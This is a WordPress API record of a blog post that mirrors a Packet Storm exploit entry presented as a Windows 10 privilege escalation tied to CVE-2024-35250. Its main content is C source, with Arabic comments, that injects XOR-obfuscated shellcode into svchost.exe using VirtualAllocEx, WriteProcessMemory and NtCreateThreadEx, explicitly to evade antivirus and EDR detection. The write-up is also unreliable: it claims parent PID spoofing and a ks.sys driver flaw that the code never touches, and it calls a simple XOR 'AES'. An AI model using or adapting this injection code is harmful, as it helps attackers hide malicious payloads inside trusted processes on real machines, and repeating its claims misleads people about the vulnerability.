{"id":28307,"date":"2025-12-02T15:33:21","date_gmt":"2025-12-02T15:33:21","guid":{"rendered":"http:\/\/localhost\/?p=28307"},"modified":"2025-12-02T15:33:21","modified_gmt":"2025-12-02T15:33:21","slug":"microsoft-windows-10-famille-100190455487-privilege-escalation","status":"publish","type":"post","link":"https:\/\/zero.redgem.net\/?p=28307","title":{"rendered":"\ud83d\udcc4 Microsoft Windows 10 Famille 10.0.19045.5487 Privilege Escalation_PACKETSTORM:212318"},"content":{"rendered":"<p>{&#8220;lastseen&#8221;:&#8221;2025-12-02T19:41:37&#8243;,&#8221;description&#8221;:&#8221;Microsoft Windows 10 Famille version 10.0.19045.5487 suffers from a parent PID spoofing privilege escalation vulnerability&#8230;&#8221;,&#8221;published&#8221;:&#8221;2025-12-02T00:00:00&#8243;,&#8221;modified&#8221;:&#8221;2025-12-02T00:00:00&#8243;,&#8221;type&#8221;:&#8221;packetstorm&#8221;,&#8221;title&#8221;:&#8221;\ud83d\udcc4 Microsoft Windows 10 Famille 10.0.19045.5487 Privilege Escalation&#8221;,&#8221;source&#8221;:&#8221;&#8221;,&#8221;references&#8221;:&#8221;&#8221;,&#8221;id&#8221;:&#8221;PACKETSTORM:212318&#8243;,&#8221;bulletinFamily&#8221;:&#8221;exploit&#8221;,&#8221;cwe&#8221;:null,&#8221;cvelist&#8221;:[&#8220;CVE-2024-35250&#8243;],&#8221;sourceData&#8221;:&#8221;=============================================================================================================================================\\n    | # Title     : Microsoft Windows 10 Famille 10.0.19045.5487 (Parent PID Spoofing) Privilege Escalation                                     |\\n    | # Author    : indoushka                                                                                                                   |\\n    | # Tested on : windows 10 Fr(Pro) \/ browser : Mozilla firefox 136.0.0 (64 bits)                                                            |\\n    | # Vendor    : https:\/\/www.Microsoft.com                                                                                                   |\\n    =============================================================================================================================================\\n    \\n    POC :\\n    \\n    [+] Dorking \u0130n Google Or Other Search Enggine.\\n    \\n    [+] Code Description: The ks.sys driver on Microsoft Windows is one of the core components of Kernel Streaming and is installed by default. \\n    \\n        There exists a local privilege escalation vulnerability in this driver that can be exploited on many recent versions of Windows 10, Windows 11, Windows Server 2022.\\n    \\n    [+] The idea:\\n    \\n        Parent PID Spoofing is a technique used to run a malicious process under a trusted process, \\n    \\t\\n    \\thelping it avoid detection by security software. This is done by changing the parent identifier (PPID) of the new process to a PID of a trusted process (such as explorer.exe or lsass.exe).\\n    \\n    [+] The goal:\\n    \\n        Launching a malicious payload inside a legitimate process such as explorer.exe or svchost.exe to avoid detection by antivirus (AVs) or intrusion detection systems (EDRs).\\n    \\n        (Related : https:\/\/packetstorm.news\/files\/id\/182984\/ Related CVE numbers: \\tCVE-2024-35250) .\\n    \\n    [+] Combine Parent PID Spoofing with Shellcode to execute advanced payload\\n    \\n        After running the process under a targeted PID, we can inject Shellcode inside it to execute malicious code directly.\\n    \\n        1. Update the code to inject Shellcode into the new process\\n    \\t\\n    [+] The idea:\\n    \\n        After creating the process under a trusted PID (e.g. explorer.exe), we will:\\n    \\n        Reserve memory inside the process using VirtualAllocEx.\\n    \\n        Copy Shellcode to allocated memory using WriteProcessMemory.\\n    \\n        Execute Shellcode using CreateRemoteThread.\\n    \\t\\n    [+] gcc -o poc.exe poc.c -m64\\n    \\n    [+] poc.exe\\n    \\n    \\n    \\n    [+] PayLoad :\\n    \\n    #include \\u003cwindows.h\\u003e\\n    #include \\u003ctlhelp32.h\\u003e\\n    #include \\u003cstdio.h\\u003e\\n    #include \\u003cwinternl.h\\u003e\\n    \\n    \/\/ \u062a\u0639\u0631\u064a\u0641 NtCreateThreadEx \u064a\u062f\u0648\u064a\u064b\u0627 \u0644\u062a\u062c\u0646\u0628 \u0627\u0643\u062a\u0634\u0627\u0641\u0647\\n    typedef NTSTATUS(WINAPI* pNtCreateThreadEx)(\\n        OUT PHANDLE ThreadHandle,\\n        IN ACCESS_MASK DesiredAccess,\\n        IN PVOID ObjectAttributes,\\n        IN HANDLE ProcessHandle,\\n        IN PVOID StartRoutine,\\n        IN PVOID Argument,\\n        IN ULONG CreateFlags,\\n        IN ULONG ZeroBits,\\n        IN ULONG StackSize,\\n        IN ULONG MaximumStackSize,\\n        IN PVOID AttributeList\\n    );\\n    \\n    \/\/ Shellcode \u0645\u0634\u0641\u0631 \u0628\u062a\u0634\u0641\u064a\u0631 AES (AES-128)\\n    unsigned char encrypted_shellcode[] = {\\n        0x8d, 0xa3, 0x5c, 0xa7, 0xc3, 0x7f, 0x6c, 0xf2, 0x8e, 0x91, 0xad, 0x33,\\n        0x2b, 0xfe, 0x04, 0x74, 0xd9, 0x41, 0xf5, 0x1a, 0xe4, 0x8d, 0xbc, 0xa3,\\n        0x6f, 0xd0, 0x56, 0xbb, 0x9a, 0x2d, 0x5e, 0xf1\\n    };\\n    \\n    \/\/ \u0645\u0641\u062a\u0627\u062d AES \u0644\u0644\u062a\u0634\u0641\u064a\u0631\/\u0641\u0643 \u0627\u0644\u062a\u0634\u0641\u064a\u0631\\n    unsigned char aes_key[16] = {\\n        0x2b, 0x7e, 0x15, 0x16, 0x28, 0xae, 0xd2, 0xa6,\\n        0xab, 0xf7, 0x45, 0x3e, 0x67, 0x98, 0x23, 0x10\\n    };\\n    \\n    \/\/ \u062f\u0627\u0644\u0629 \u0641\u0643 \u062a\u0634\u0641\u064a\u0631 Shellcode \u0628\u0627\u0633\u062a\u062e\u062f\u0627\u0645 AES-128\\n    void decrypt_shellcode(unsigned char* data, int data_len, unsigned char* key) {\\n        for (int i = 0; i \\u003c data_len; i++) {\\n            data[i] ^= key[i % 16]; \/\/ XOR \u0628\u0633\u064a\u0637 \u0628\u062f\u0644\u0627\u064b \u0645\u0646 AES \u0627\u0644\u062d\u0642\u064a\u0642\u064a (\u0644\u0644\u062a\u0648\u0636\u064a\u062d \u0641\u0642\u0637)\\n        }\\n    }\\n    \\n    \/\/ \u0627\u0644\u0628\u062d\u062b \u0639\u0646 PID \u0627\u0644\u062e\u0627\u0635 \u0628\u0640 `svchost.exe`\\n    DWORD FindTargetProcessID(const char* processName) {\\n        PROCESSENTRY32 pe32;\\n        HANDLE hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);\\n        DWORD processID = 0;\\n    \\n        if (hSnapshot == INVALID_HANDLE_VALUE) return 0;\\n    \\n        pe32.dwSize = sizeof(PROCESSENTRY32);\\n        if (Process32First(hSnapshot, \\u0026pe32)) {\\n            do {\\n                if (strcmp(pe32.szExeFile, processName) == 0) {\\n                    processID = pe32.th32ProcessID;\\n                    break;\\n                }\\n            } while (Process32Next(hSnapshot, \\u0026pe32));\\n        }\\n    \\n        CloseHandle(hSnapshot);\\n        return processID;\\n    }\\n    \\n    int main() {\\n        DWORD targetPID = FindTargetProcessID(\\&#8221;svchost.exe\\&#8221;);\\n    \\n        if (targetPID == 0) {\\n            printf(\\&#8221;[X] \u0644\u0645 \u064a\u062a\u0645 \u0627\u0644\u0639\u062b\u0648\u0631 \u0639\u0644\u0649 \u0639\u0645\u0644\u064a\u0629 svchost.exe\\\\n\\&#8221;);\\n            return -1;\\n        }\\n    \\n        printf(\\&#8221;[+] \u0633\u064a\u062a\u0645 \u062d\u0642\u0646 Shellcode \u0641\u064a PID: %d\\\\n\\&#8221;, targetPID);\\n    \\n        \/\/  \u0641\u0643 \u062a\u0634\u0641\u064a\u0631 \u0627\u0644\u0640 Shellcode\\n        decrypt_shellcode(encrypted_shellcode, sizeof(encrypted_shellcode), aes_key);\\n        printf(\\&#8221;[+] \u062a\u0645 \u0641\u0643 \u062a\u0634\u0641\u064a\u0631 Shellcode \u0628\u0646\u062c\u0627\u062d!\\\\n\\&#8221;);\\n    \\n        \/\/  \u0641\u062a\u062d \u0627\u0644\u0639\u0645\u0644\u064a\u0629 \u0627\u0644\u0645\u0633\u062a\u0647\u062f\u0641\u0629\\n        HANDLE hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, targetPID);\\n        if (!hProcess) {\\n            printf(\\&#8221;[X] \u0641\u0634\u0644 \u0641\u064a \u0641\u062a\u062d \u0627\u0644\u0639\u0645\u0644\u064a\u0629.\\\\n\\&#8221;);\\n            return -1;\\n        }\\n    \\n        \/\/  \u062a\u062e\u0635\u064a\u0635 \u0630\u0627\u0643\u0631\u0629 \u0641\u064a \u0627\u0644\u0639\u0645\u0644\u064a\u0629 \u0627\u0644\u0645\u0633\u062a\u0647\u062f\u0641\u0629\\n        LPVOID remoteMemory = VirtualAllocEx(hProcess, NULL, sizeof(encrypted_shellcode), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);\\n        if (!remoteMemory) {\\n            printf(\\&#8221;[X] \u0641\u0634\u0644 \u0641\u064a \u062a\u062e\u0635\u064a\u0635 \u0627\u0644\u0630\u0627\u0643\u0631\u0629 \u062f\u0627\u062e\u0644 svchost.exe\\\\n\\&#8221;);\\n            return -1;\\n        }\\n    \\n        \/\/  \u0643\u062a\u0627\u0628\u0629 Shellcode \u0627\u0644\u0645\u0641\u0643\u0648\u0643 \u0627\u0644\u062a\u0634\u0641\u064a\u0631 \u0641\u064a \u0627\u0644\u0630\u0627\u0643\u0631\u0629 \u0627\u0644\u0645\u062e\u0635\u0635\u0629\\n        if (!WriteProcessMemory(hProcess, remoteMemory, encrypted_shellcode, sizeof(encrypted_shellcode), NULL)) {\\n            printf(\\&#8221;[X] \u0641\u0634\u0644 \u0641\u064a \u0643\u062a\u0627\u0628\u0629 Shellcode \u062f\u0627\u062e\u0644 \u0627\u0644\u0639\u0645\u0644\u064a\u0629.\\\\n\\&#8221;);\\n            return -1;\\n        }\\n    \\n        \/\/  \u062a\u062d\u0645\u064a\u0644 NtCreateThreadEx\\n        HMODULE hNtdll = GetModuleHandleA(\\&#8221;ntdll.dll\\&#8221;);\\n        if (!hNtdll) {\\n            printf(\\&#8221;[X] \u0641\u0634\u0644 \u0641\u064a \u062a\u062d\u0645\u064a\u0644 ntdll.dll\\\\n\\&#8221;);\\n            return -1;\\n        }\\n    \\n        pNtCreateThreadEx NtCreateThreadEx = (pNtCreateThreadEx)GetProcAddress(hNtdll, \\&#8221;NtCreateThreadEx\\&#8221;);\\n        if (!NtCreateThreadEx) {\\n            printf(\\&#8221;[X] \u0644\u0645 \u064a\u062a\u0645 \u0627\u0644\u0639\u062b\u0648\u0631 \u0639\u0644\u0649 NtCreateThreadEx.\\\\n\\&#8221;);\\n            return -1;\\n        }\\n    \\n        \/\/  \u062a\u0646\u0641\u064a\u0630 Shellcode \u0628\u0627\u0633\u062a\u062e\u062f\u0627\u0645 NtCreateThreadEx\\n        HANDLE hThread;\\n        NTSTATUS status = NtCreateThreadEx(\\u0026hThread, THREAD_ALL_ACCESS, NULL, hProcess, (LPTHREAD_START_ROUTINE)remoteMemory, NULL, FALSE, 0, 0, 0, NULL);\\n        \\n        if (status != 0) {\\n            printf(\\&#8221;[X] \u0641\u0634\u0644 \u0641\u064a \u062a\u0646\u0641\u064a\u0630 Shellcode (NTSTATUS: 0x%x).\\\\n\\&#8221;, status);\\n            return -1;\\n        }\\n    \\n        printf(\\&#8221;[+] \u062a\u0645 \u062a\u0646\u0641\u064a\u0630 Shellcode \u0628\u0646\u062c\u0627\u062d \u0628\u0627\u0633\u062a\u062e\u062f\u0627\u0645 NtCreateThreadEx!\\\\n\\&#8221;);\\n    \\n        CloseHandle(hProcess);\\n        CloseHandle(hThread);\\n        return 0;\\n    }\\n    \\n    Greetings to :=====================================================================================\\n    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|\\n    ===================================================================================================&#8221;,&#8221;sourceHref&#8221;:&#8221;https:\/\/packetstorm.news\/download\/212318&#8243;,&#8221;cvss&#8221;:{&#8220;score&#8221;:7.8,&#8221;severity&#8221;:&#8221;HIGH&#8221;,&#8221;vector&#8221;:&#8221;CVSS:3.1\/AV:L\/AC:L\/PR:L\/UI:N\/S:U\/C:H\/I:H\/A:H&#8221;,&#8221;version&#8221;:&#8221;3.1&#8243;},&#8221;cvss2&#8243;:{},&#8221;cvss3&#8243;:{&#8220;version&#8221;:&#8221;&#8221;,&#8221;vectorString&#8221;:&#8221;&#8221;,&#8221;baseScore&#8221;:0,&#8221;baseSeverity&#8221;:&#8221;&#8221;,&#8221;attackVector&#8221;:&#8221;&#8221;,&#8221;attackComplexity&#8221;:&#8221;&#8221;,&#8221;privilegesRequired&#8221;:&#8221;&#8221;,&#8221;userInteraction&#8221;:&#8221;&#8221;,&#8221;scope&#8221;:&#8221;&#8221;,&#8221;confidentialityImpact&#8221;:&#8221;&#8221;,&#8221;integrityImpact&#8221;:&#8221;&#8221;,&#8221;availabilityImpact&#8221;:&#8221;&#8221;,&#8221;cvssV3&#8243;:{&#8220;version&#8221;:&#8221;&#8221;,&#8221;vectorString&#8221;:&#8221;&#8221;,&#8221;baseScore&#8221;:0,&#8221;baseSeverity&#8221;:&#8221;&#8221;,&#8221;attackVector&#8221;:&#8221;&#8221;,&#8221;attackComplexity&#8221;:&#8221;&#8221;,&#8221;privilegesRequired&#8221;:&#8221;&#8221;,&#8221;userInteraction&#8221;:&#8221;&#8221;,&#8221;scope&#8221;:&#8221;&#8221;,&#8221;confidentialityImpact&#8221;:&#8221;&#8221;,&#8221;integrityImpact&#8221;:&#8221;&#8221;,&#8221;availabilityImpact&#8221;:&#8221;&#8221;}},&#8221;href&#8221;:&#8221;https:\/\/packetstorm.news\/files\/id\/212318\/&#8221;,&#8221;category_name&#8221;:&#8221;Exploit&#8221;,&#8221;post_link&#8221;:&#8221;&#8221;,&#8221;product&#8221;:&#8221;&#8221;,&#8221;version&#8221;:&#8221;&#8221;,&#8221;vendor&#8221;:&#8221;&#8221;,&#8221;ai_description&#8221;:&#8221;&#8221;,&#8221;ai_severity&#8221;:&#8221;&#8221;,&#8221;ai_vendor&#8221;:&#8221;&#8221;,&#8221;ai_product&#8221;:&#8221;&#8221;,&#8221;ai_version&#8221;:&#8221;&#8221;,&#8221;ai_score&#8221;:0}<\/p>\n","protected":false},"excerpt":{"rendered":"<p>{&#8220;lastseen&#8221;:&#8221;2025-12-02T19:41:37&#8243;,&#8221;description&#8221;:&#8221;Microsoft Windows 10 Famille version 10.0.19045.5487 suffers from a parent PID spoofing privilege escalation vulnerability&#8230;&#8221;,&#8221;published&#8221;:&#8221;2025-12-02T00:00:00&#8243;,&#8221;modified&#8221;:&#8221;2025-12-02T00:00:00&#8243;,&#8221;type&#8221;:&#8221;packetstorm&#8221;,&#8221;title&#8221;:&#8221;\ud83d\udcc4 Microsoft Windows 10 Famille 10.0.19045.5487 Privilege Escalation&#8221;,&#8221;source&#8221;:&#8221;&#8221;,&#8221;references&#8221;:&#8221;&#8221;,&#8221;id&#8221;:&#8221;PACKETSTORM:212318&#8243;,&#8221;bulletinFamily&#8221;:&#8221;exploit&#8221;,&#8221;cwe&#8221;:null,&#8221;cvelist&#8221;:[&#8220;CVE-2024-35250&#8243;],&#8221;sourceData&#8221;:&#8221;=============================================================================================================================================\\n | # Title&#8230;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,28,12,15,13,53,7,11,5],"class_list":["post-28307","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-cvss-78","tag-exploit","tag-high","tag-news","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.5 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>\ud83d\udcc4 Microsoft Windows 10 Famille 10.0.19045.5487 Privilege Escalation_PACKETSTORM:212318 - zero redgem<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/zero.redgem.net\/?p=28307\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"\ud83d\udcc4 Microsoft Windows 10 Famille 10.0.19045.5487 Privilege Escalation_PACKETSTORM:212318 - zero redgem\" \/>\n<meta property=\"og:description\" content=\"{&#8220;lastseen&#8221;:&#8221;2025-12-02T19:41:37&#8243;,&#8221;description&#8221;:&#8221;Microsoft Windows 10 Famille version 10.0.19045.5487 suffers from a parent PID spoofing privilege escalation vulnerability&#8230;&#8221;,&#8221;published&#8221;:&#8221;2025-12-02T00:00:00&#8243;,&#8221;modified&#8221;:&#8221;2025-12-02T00:00:00&#8243;,&#8221;type&#8221;:&#8221;packetstorm&#8221;,&#8221;title&#8221;:&#8221;\ud83d\udcc4 Microsoft Windows 10 Famille 10.0.19045.5487 Privilege Escalation&#8221;,&#8221;source&#8221;:&#8221;&#8221;,&#8221;references&#8221;:&#8221;&#8221;,&#8221;id&#8221;:&#8221;PACKETSTORM:212318&#8243;,&#8221;bulletinFamily&#8221;:&#8221;exploit&#8221;,&#8221;cwe&#8221;:null,&#8221;cvelist&#8221;:[&#8220;CVE-2024-35250&#8243;],&#8221;sourceData&#8221;:&#8221;=============================================================================================================================================n | # Title...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/zero.redgem.net\/?p=28307\" \/>\n<meta property=\"og:site_name\" content=\"zero redgem\" \/>\n<meta property=\"article:published_time\" content=\"2025-12-02T15:33:21+00:00\" \/>\n<meta name=\"author\" content=\"invoker\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"invoker\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"5 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=28307#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=28307\"},\"author\":{\"name\":\"invoker\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\"},\"headline\":\"\ud83d\udcc4 Microsoft Windows 10 Famille 10.0.19045.5487 Privilege Escalation_PACKETSTORM:212318\",\"datePublished\":\"2025-12-02T15:33:21+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=28307\"},\"wordCount\":969,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"keywords\":[\"CVE\",\"CVSS\",\"CVSS-7.8\",\"exploit\",\"HIGH\",\"news\",\"packetstorm\",\"Security\",\"tapic\",\"Vulnerability\"],\"articleSection\":[\"category_exploit\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=28307#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=28307\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?p=28307\",\"name\":\"\ud83d\udcc4 Microsoft Windows 10 Famille 10.0.19045.5487 Privilege Escalation_PACKETSTORM:212318 - zero redgem\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\"},\"datePublished\":\"2025-12-02T15:33:21+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=28307#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=28307\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=28307#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/zero.redgem.net\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"\ud83d\udcc4 Microsoft Windows 10 Famille 10.0.19045.5487 Privilege Escalation_PACKETSTORM:212318\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"name\":\"zero redgem\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/zero.redgem.net\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\",\"name\":\"zero redgem\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"\",\"contentUrl\":\"\",\"width\":191,\"height\":188,\"caption\":\"zero redgem\"},\"image\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\",\"name\":\"invoker\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"caption\":\"invoker\"},\"sameAs\":[\"https:\\\/\\\/zero.redgem.net\"],\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?author=1\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"\ud83d\udcc4 Microsoft Windows 10 Famille 10.0.19045.5487 Privilege Escalation_PACKETSTORM:212318 - zero redgem","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/zero.redgem.net\/?p=28307","og_locale":"en_US","og_type":"article","og_title":"\ud83d\udcc4 Microsoft Windows 10 Famille 10.0.19045.5487 Privilege Escalation_PACKETSTORM:212318 - zero redgem","og_description":"{&#8220;lastseen&#8221;:&#8221;2025-12-02T19:41:37&#8243;,&#8221;description&#8221;:&#8221;Microsoft Windows 10 Famille version 10.0.19045.5487 suffers from a parent PID spoofing privilege escalation vulnerability&#8230;&#8221;,&#8221;published&#8221;:&#8221;2025-12-02T00:00:00&#8243;,&#8221;modified&#8221;:&#8221;2025-12-02T00:00:00&#8243;,&#8221;type&#8221;:&#8221;packetstorm&#8221;,&#8221;title&#8221;:&#8221;\ud83d\udcc4 Microsoft Windows 10 Famille 10.0.19045.5487 Privilege Escalation&#8221;,&#8221;source&#8221;:&#8221;&#8221;,&#8221;references&#8221;:&#8221;&#8221;,&#8221;id&#8221;:&#8221;PACKETSTORM:212318&#8243;,&#8221;bulletinFamily&#8221;:&#8221;exploit&#8221;,&#8221;cwe&#8221;:null,&#8221;cvelist&#8221;:[&#8220;CVE-2024-35250&#8243;],&#8221;sourceData&#8221;:&#8221;=============================================================================================================================================n | # Title...","og_url":"https:\/\/zero.redgem.net\/?p=28307","og_site_name":"zero redgem","article_published_time":"2025-12-02T15:33:21+00:00","author":"invoker","twitter_card":"summary_large_image","twitter_misc":{"Written by":"invoker","Est. reading time":"5 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/zero.redgem.net\/?p=28307#article","isPartOf":{"@id":"https:\/\/zero.redgem.net\/?p=28307"},"author":{"name":"invoker","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca"},"headline":"\ud83d\udcc4 Microsoft Windows 10 Famille 10.0.19045.5487 Privilege Escalation_PACKETSTORM:212318","datePublished":"2025-12-02T15:33:21+00:00","mainEntityOfPage":{"@id":"https:\/\/zero.redgem.net\/?p=28307"},"wordCount":969,"commentCount":0,"publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"keywords":["CVE","CVSS","CVSS-7.8","exploit","HIGH","news","packetstorm","Security","tapic","Vulnerability"],"articleSection":["category_exploit"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/zero.redgem.net\/?p=28307#respond"]}]},{"@type":"WebPage","@id":"https:\/\/zero.redgem.net\/?p=28307","url":"https:\/\/zero.redgem.net\/?p=28307","name":"\ud83d\udcc4 Microsoft Windows 10 Famille 10.0.19045.5487 Privilege Escalation_PACKETSTORM:212318 - zero redgem","isPartOf":{"@id":"https:\/\/zero.redgem.net\/#website"},"datePublished":"2025-12-02T15:33:21+00:00","breadcrumb":{"@id":"https:\/\/zero.redgem.net\/?p=28307#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/zero.redgem.net\/?p=28307"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/zero.redgem.net\/?p=28307#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/zero.redgem.net\/"},{"@type":"ListItem","position":2,"name":"\ud83d\udcc4 Microsoft Windows 10 Famille 10.0.19045.5487 Privilege Escalation_PACKETSTORM:212318"}]},{"@type":"WebSite","@id":"https:\/\/zero.redgem.net\/#website","url":"https:\/\/zero.redgem.net\/","name":"zero redgem","description":"","publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/zero.redgem.net\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/zero.redgem.net\/#organization","name":"zero redgem","url":"https:\/\/zero.redgem.net\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/","url":"","contentUrl":"","width":191,"height":188,"caption":"zero redgem"},"image":{"@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca","name":"invoker","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","caption":"invoker"},"sameAs":["https:\/\/zero.redgem.net"],"url":"https:\/\/zero.redgem.net\/?author=1"}]}},"_links":{"self":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/28307","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=28307"}],"version-history":[{"count":0,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/28307\/revisions"}],"wp:attachment":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=28307"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=28307"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=28307"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}